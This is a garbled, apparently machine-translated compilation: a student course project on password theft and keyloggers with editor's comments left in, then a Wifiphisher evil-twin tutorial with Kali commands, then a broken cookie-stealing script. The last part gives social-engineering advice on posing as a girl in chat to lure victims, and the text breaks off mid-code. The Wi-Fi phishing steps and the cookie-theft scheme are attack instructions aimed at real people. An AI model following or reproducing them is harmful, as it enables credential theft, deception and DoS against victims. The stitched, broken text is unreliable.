We collect user passwords using a proxy and a sniffer. Sniffing data in other programs

Introduction

Agree that nowadays it is difficult to imagine computer life without constantly entering a password. We need a password everywhere - from turning on the computer, registering on various sites and forums, accessing our mailboxes, and ending with creating accounts (pages with personal data and settings) in payment systems and sending/receiving payments electronically. And if during a one-time registration on some random site (for example, just to download a game), you can without hesitation specify any password (even “123456”), then when creating a permanent account on an important site (especially if it is related to money operations) the password must be very strong. Otherwise, the password can be hacked by an attacker, and the personal data obtained can be used to communicate online on our behalf (at best) or to obtain loans or open accounts. Therefore, it is better to take care of protection in advance and change all your “weak” passwords to more secure ones today.
The purpose of the course project is to consider methods of intercepting passwords of computer system users and methods of countering them

Even a little like that)))))))))))))))))))))))))))))
The purpose of the course project is ???????????????
METHODS FOR INTERCEPING AND COUNTERING PASSWORDS

Brute force
Brute force (from English bruteforce - exhaustive search or the "brute force" method) is one of the popular methods of cracking passwords on servers and in various programs. It consists in the fact that a cracking program tries to gain access to some program (for example, a mailbox) by brute-forcing passwords according to criteria specified by the owner of this program: by dictionary, by length, by combinations of numbers, and in principle such criteria there are many.
The brute force hacking method is quite long, but powerful, so it remains in service with hackers to this day, and taking into account the ever-increasing power of computers and the bandwidth of Internet channels, it will remain in service for a long time.
This method of guessing passwords is very good because the password is eventually cracked, but this can take a very, very long time, often even centuries. So this hacking method does not always justify itself if the user-owner of the hacked service behaved quite cunningly and did not use simple passwords like “123”, “qwerty” and the like, but used both uppercase and lowercase characters, plus all this used both numbers and allowed special characters. If the password is also long enough (about 10 characters), then it is practically not in danger of being hacked using brute force.
With brute force, a dictionary attack is most often used - passwords are selected from a text file of a pre-compiled (begged for, purchased, stolen, downloaded for free) dictionary. This method of attack is very effective in mass hacking of, say, ICQ Internet messenger accounts, when an attacker, for example, tries to hack a certain range of ICQ numbers. Moreover, there is a fairly high probability that with a dictionary attack he will succeed. Examples include repeated incidents of hacking.
Since 2005, the number of attacks against secure SSH services has also increased significantly. Even if you have the latest software installed on your server, this does not mean that it is impossible to guess the password for it if the firewall is inactive or configured incorrectly or insufficiently. So, to increase the impossibility of hacking, configure your firewall properly, this will help protect you from unpleasant surprises in the future.
There are a lot of programs for performing brute force on the Internet, and there are also a large number of free and paid dictionaries for them.
And finally, let's talk a little about the mathematical side of Brutus.
As Wikipedia says, any problem from the NP class can be solved by exhaustive search. But all this can take exponential time.
When developing various cryptographic ciphers, the brute force method is used to evaluate its (cipher) resistance to cracking. In this case, a new cipher is considered sufficiently strong if there is no faster method of breaking it than a complete search of all possible keys. Such cryptographic attacks, like brute attacks, are the most effective, but they often take a lot of time.
When certain conditions are known, the password brute method uses filtering out unacceptable values ​​(blank passwords, the same repeated characters, etc.). In mathematics, this method is called the branch and bound method.
Also, brute force methods are used to parallelize calculations, when several passwords are tried simultaneously. This is done by two methods: the conveyor method and the brute method from disjoint subsets of all possible passwords.

Figure 1. Windows hardware input model
When certain input events occur (key presses, mouse movements), the events are processed by the appropriate driver and placed in the system hardware input queue. The system has a special raw input thread called RIT (RawInputThread) that retrieves events from the system queue and converts them into messages. Received messages are placed at the end of the virtual input queue of one of the threads (the thread's virtual queue is called VIQ - VirtualizedInputQueue-). In this case, RIT itself figures out which specific thread queue the event should be placed in. For mouse events, the flow is determined by finding the window over which the mouse cursor is located. Keyboard events are sent to only one thread - the so-called active thread (i.e. the thread that owns the window the user is working with). In fact, this is not entirely true - in particular, Figure 1 shows thread A without a virtual input queue. In this case, threads A and B share the same virtual input queue. This is achieved by using an API call to the AttachThreadInput function, which allows one thread to attach to another thread's virtual input queue.
It should be noted that the raw input thread is responsible for processing special keyboard shortcuts, in particular Alt+Tab and Ctrl+Alt+Del.
Monitoring keyboard input using traps
This technique is classic for keyloggers. The essence of the method is to use the operating system hook mechanism. Traps allow you to monitor messages being processed by other program windows. Installation and removal of hooks is done using well-documented API functions of the user32.dll library (the SetWindowsHookEx function allows you to install a hook, UnhookWindowsHookEx allows you to remove it). When setting a trap, you specify the type of messages for which the trap handler should be called. In particular, there are two special hook types WH_KEYBOARD and WH_MOUSE - for logging keyboard and mouse events, respectively. The trap can be set for a given thread or for all threads in the system. A trap for all system threads is very convenient for building a keylogger.
The hook event handler code must be located in a DLL. This requirement is due to the fact that the DLL with the hook handler is projected by the system into the address space of all GUI processes. An interesting feature is that the DLL is projected not when the hook is set, but when the GUI process receives the first message that satisfies the hook's parameters.
The trap method is quite simple and effective, but it has a number of disadvantages. The first disadvantage is that the DLL with the hook is projected into the address space of all GUI processes, which can be used to detect keyloggers. In addition, keyboard event logging is only possible for GUI applications, this can be easily verified using the demo program.
Monitoring keyboard input using keyboard polling
This technique is based on periodic polling of the keyboard state. To poll the state of keys, the system provides a special function GetKeyboardState, which returns an array of 255 bytes, in which each byte contains the state of a specific key on the keyboard. This method no longer requires the implementation of DLLs in GUI processes and, as a result, the spyware is less noticeable.
However, the change in key status occurs as the thread reads keyboard messages from its queue, and as a result, this technique only works for monitoring GUI applications. The GetAsyncKeyState function is free from this drawback, returning the state of the key at the time the function was called.
The disadvantage of this type of keylogger is the need to periodically poll the state of the keyboard at a fairly high speed, at least 10-20 polls per second.
Tracking keyboard input using API function interception
This technique is not widely used, but nevertheless it can be successfully used to build keyloggers. The difference between RootKit and keyloggers in this case is small - the spy will intercept functions for the purpose of monitoring, and not for the purpose of modifying the principles of operation and results call.
The simplest way would be to intercept the GetMessage, PeekMessage and TranslateMessage functions of the User32 library, which will allow you to monitor all messages received by GUI applications.

Driver-based keylogger
This method is even more effective than the methods described above. There are at least two options for implementing this method - writing and installing your own keyboard driver in the system instead of the standard one, or installing a filter driver. Using a driver filter is the most correct method.

Hardware keyloggers
When solving problems of protection against information leakage, only various software tools for spying on the user’s work are often considered. However, in addition to software, hardware is also possible:
Installing a tracking device into the keyboard cable break (for example, the device can be made in the form of a PS/2 adapter);
Embedding a tracking device into the keyboard;
Reading data by registering PEMIN (spurious electromagnetic radiation and interference);
Visual observation of the keyboard
Hardware keyloggers are much less common than software ones. However, when checking particularly critical computers (for example, those used for banking transactions), one should not forget about the possibility of hardware tracking of keyboard input.
Keylogger example
Currently, there are hundreds of keyloggers; consider as an example the fairly common commercial program ActualSpy (The program dialog box is shown below) (http://www.actualspy.ru). This program can register keyboard input (with registration of the window title and program name), take screenshots of the screen according to a schedule, register the start/stop of programs, monitor the clipboard, printer, and user-created files. In addition, the program monitors Internet connections and visited sites. ActualSpy is chosen as an example

The program has the simplest camouflage from detection - it is not visible in the standard Windows task list. To analyze the collected information, the program generates protocols in HTML format. The operating principle of the ActualSpy program is based on a trap that registers keyboard events.
Other examples include SpyAgent (http://www.spytech-web.com), ActMon (http://www.actmon.com), SpyBuddy (http://www.actmon.com), PC ActivityMonitor ( http://www.keyloggers.com), KGB Spy (http://www.refog.ru/)…. This list can be continued for a very long time, but in most cases, modern keyloggers have approximately the same basic functionality and differ in service functions and the quality of masking in the system.
Techniques for finding keyloggers
1. Search by signatures. This method does not differ from standard virus search techniques. Signature search allows you to uniquely identify keyloggers; with the correct choice of signatures, the probability of error is almost zero. However, a signature scanner will be able to detect objects that are previously known and described in its database;
2. Heuristic algorithms. As the name suggests, these are methods for searching for a keylogger based on its characteristic features. Heuristic search is probabilistic in nature. As practice has shown, this method is most effective for finding keyloggers of the most common type - those based on traps. However, such methods give many false positives. Research has shown that there are hundreds of secure programs that are not keyloggers but that set traps to monitor keyboard and mouse input. The most common examples are PuntoSwitcher programs, the Lingvo dictionary, software from multimedia keyboards and mice;
3. Monitoring API functions used by keyloggers. This technique is based on intercepting a number of functions used by a keylogger - in particular, the SetWindowsHookEx, UnhookWindowsHookEx, GetAsyncKeyState, GetKeyboardState functions. Calling these functions by any application allows you to raise an alarm in time, however, the problems of numerous false alarms will be similar to method 2;
4. Monitoring drivers, processes and services used by the system. This is a universal technique that is applicable not only against keyloggers. In the simplest case, you can use programs like KasperskyInspector or Adinf, which monitor the appearance of new files in the system.

Programs for finding and removing keyloggers
1. Any antivirus product. All antiviruses can detect keyloggers to one degree or another, but a keylogger is not a virus and, as a result, the antivirus is of little use;
2. Utilities that implement the signature search mechanism and heuristic search mechanisms. An example is the AVZ utility, which combines a signature scanner and a trap-based keylogger detection system;
3. Specialized utilities and programs designed to detect keyloggers and block their work. Such programs are most effective for detecting and blocking keyloggers, since they can usually block almost all types of keyloggers.

Among specialized programs, commercial products PrivacyKeyboard and Anti-keylogger may be of interest (example program (http://www.bezpeka.biz/). The interface of the Anti-keylogger program is shown in the figure:

Anti-keylogger program runs in the background and detects programs suspected of tracking the keyboard. If necessary, you can manually unblock the operation of any of the detected programs (for example, the figure shows that MSCTF and the Internet download program FlashGet are included in the list of “spyware”). Signature databases are not used to detect keyloggers; detection is carried out using heuristic methods.
Testing of the program has shown that it effectively counters keyloggers based on the use of traps, cyclic polling and a keyboard driver-filter.
Another example is the AdvancedAntiKeylogger program (An example of the program is shown below) (http://www.anti-keylogger.net).

In training mode, this program is similar in operating logic to Firewall - when suspicious activity is detected, a warning is issued indicating the name and description of the program. The user can select an action for the session (allow, deny), or create a permanent rule for the application. During the tests, AdvancedAntiKeylogger confidently detected all the main types of keyloggers (based on a trap, cyclic polling, and driver-filter). The program settings are protected by a password that is specified during installation.

Conclusion
A keylogger is not a virus, but nevertheless poses a great threat to users because it allows an attacker to monitor the user's work and can be used to steal confidential information, including user passwords. The danger of a keylogger can increase significantly when it is combined with RootKit technology, which will mask the presence of a keylogger. Even more dangerous is a Trojan or backdoor program that contains a keylogger - its presence significantly expands the functions of the Trojan program and its danger to the user.

So, put everything in order, I can’t understand where the points are, what is what, sign all the drawings. remove (or replace) all phrases of the argument this is not a journal

Well that's okay
Conclusion

After studying the material, you can draw some conclusions:
What is this I’m afraid to ask)))))))))))))))))?????????????????????? Remove the word Are you writing a book?
1. The password should not be short.
Having a password of less than 8 characters is generally undesirable, and it is even better if the password contains 10-12 characters or more.
2. The password should not contain only numbers or only letters (especially repeating ones). It is best when letters and numbers alternate, and even better if special characters or punctuation marks are added to the password.
4. Do not use a password that contains any data about you or your family - all kinds of memorable dates (births, weddings, etc.), first and last names of relatives, apartment numbers, documents or telephone numbers. It is also unacceptable to use any combinations made from personal data.
5. The password should be meaningless, so it is better to avoid a password that is any existing dictionary word (in any language).
6. Do not use “secret questions”, the answers to which can be easily found out or selected.
7. It is necessary to use a unique password for each individual Internet service, forum, site.
8. Don't keep passwords in plain sight.
9. Do not store passwords on the Internet or on your computer as a text file.
If an attacker gains access to our computer, then it will be even easier to find a file with passwords for him (and anywhere on the hard drive).
10. Do not store passwords using built-in browser “password savers”.
Firstly, you can never be sure of the reliability of such a “keeper” and that the browser itself does not contain “holes” in its protection. Attackers primarily look for “holes” in browsers, because... Everyone uses browsers.
Secondly, if there is a failure in the browser or the entire system, then there is a very high probability that we will lose access to all the passwords that the browser stores, and although this is not hacking, it is also unpleasant.
11. Make copies of passwords.
If you use special software to store passwords, do not forget to periodically make backup copies of your password databases. If you store passwords on a piece of paper, then make a second copy of such a sheet (or notepad) and store the original and duplicate in different (secluded) places.
12. Do not enter passwords in third-party programs, on third-party sites, and do not send passwords by mail (even upon request from the support service or site administration). The administration of a REAL serious site will never require a password, so if you receive such a request, then this is most likely the work of scammers.
13. Enter passwords using other people’s computers as rarely as possible, especially in public places (Internet cafes, terminals, etc.). It is highly undesirable to enter passwords on someone else’s computer to log into a payment system account or use Internet banking, because It is possible that this computer uses a device or program to remember the sequence of keystrokes (keyloggers).
14. Change passwords periodically (especially if you used the password on someone else’s computer). The stronger the password, the longer you can use it. A strong password of 12-14 characters, compiled taking into account the recommendations described above, can not be changed for several years.

List of references (it will be here someday)

But some readers complain that cracking WPA2 takes too much time, and that WPS protection is not enabled on all access points (in my opinion, there are still quite a lot of access points with WPS). To help you in such situations, I will tell you about a virtually guaranteed way to get the Wi-Fi password without any hacking using

Hidden from guests

Stages of the Wifiphisher strategy
​

The idea is to create and then deauthenticate the user from his original point (a DoS attack is also suitable for this). After reconnecting, he will be taken to your fake access point with the same SSID and see a seemingly real web page asking for a password due to a “firmware update.” Once the password is entered, you will intercept it and allow him to use the evil twin as the real access point without him suspecting anything. Great plan!

So Wifiphisher does the following:

To achieve your goal, you will need two, one of which is capable of performing packet injection. In this case, I used the model. You can choose other adapters, but before you do so, make sure they are compatible with (support packet injection). Please don't complain that nothing works for you until you test your wireless adapter and make sure it is capable of packet injection. Most models do not have this feature.

Well now, let's take a look at Wifiphisher.

Step 1: Download Wifiphisher

To get started, launch Kali and open a terminal. Then download Wifiphisher from

Hidden from guests

And unpack the code.

Kali > tar -xvzf /root/wifiphisher-1.1.tar.gz

In the screenshot below you can see that I have extracted the Wifiphisher source code.

Alternatively, you can copy the code from GitHub by running the following command:

Kali > git clone https://github/sophron/wifiphisher

Kali > cd wifiphisher-.1.1

Looking through the contents of this directory, you will see the wifiphisher.py script there.

Kali > ls -l

Step 3: Run the script

You can run the Wifiphisher script using this command:

Kali > python wifiphisher.py

Please note that before the name of the script I put the name of the interpreter - python.

The first time you run it, the script will most likely tell you that “hostapd” was not found and will prompt you to install it. To begin installing hostapd, enter "y" (yes).

Once the installation is complete, run the Wifiphisher script again.

Kali > python wifiphisher.py

This time it will start a web server on port 8080 and 443 and then search for all available Wi-Fi networks.

After this, you will see a list of all detected Wi-Fi networks on the screen. In my example, the utility managed to find a network called “wonderhowto”. She will become the target of our attack.

Step 4: Launch the attack and get the password

Click Ctrl+C on your keyboard and the app will ask you to enter the number of the access point you want to attack. In my case this is point number 12.

After pressing the Enter key, Wifiphisher will show you the page that you can see in the screenshot below. This means that the interface is now in use and the SSID is being cloned and the selected access point is being attacked.

The user will be disconnected from their access point. When reconnecting, it will be directed to ours.

Once this happens, the proxy on the web server will intercept the request and present the user with a fake login page informing them that they have installed a new version of the router firmware and need to re-authenticate.

As you can see, I entered my password (nullbyte) and clicked Submit.

When the user enters their password, it will be transmitted to you through the Wifiphisher open terminal. Then the utility will allow the user to access the Internet through your system so that he does not suspect anything.

Now you can get even the most complex Wi-Fi password! Don’t forget to come back to us from time to time for new interesting articles on various hacking techniques!

var cook=show_all_cookies();

document.open("cookies",cook);

document.write("

document.close("cookies");

(the script was slightly changed for security reasons) Now all that remains is to lure the victim to the site, where a window will pop up with the words “Good day” after clicking on the OK button, your Cookies will be sent to the attacker, which contain a lot of interesting things - from your IP addresses to passwords for the services you use.

A simple study of Cookies can reveal quite a lot of interesting information. All the attacker risks is that he shines his soap, but since there are too many free mailboxes now, this is not so dangerous. Typically, a box is created to carry out an attack, and then either demolished or abandoned so that the burglar can no longer be found. Although you can write this script in a file with the js extension and insert it on the site using

Let's post ours!

in this case the soap no longer glows. How to lure a victim to your site? Yes, there are insanely many ways, for example, you barge into the chat and choose a victim, after talking a little with the victim, you must win her favor, it is best if your victim is of the opposite sex to you. Practice shows that it is best for you to be represented in a chat by a girl; accordingly, choose a nickname for yourself that would characterize you as a girl (when talking, watch what you write. Don’t give yourself away with the endings of words, if you pretended to be a girl, then be one). Everyone understands that everyone will talk to the girl. Remember that it is better not to put pressure on the victim, but, for example, ask “do you have a photo? Mine is at this address http://your site.ru, go if you want.” Every guy will be interested in knowing what his interlocutor looks like, and as soon as he gets to your page, you go into the sweat box and take his Cookies from there. That's all, now you just need to rummage through them and you will find almost everything you want, in the same way you can find out the IP address of a person who uses proxy servers, and knowing the IP, you can already check it for shared resources, carry out a Dos attack or Just childishly throw him out of the chat. You can also just make fun using the site, for example, using this script:

for(I=1 ; I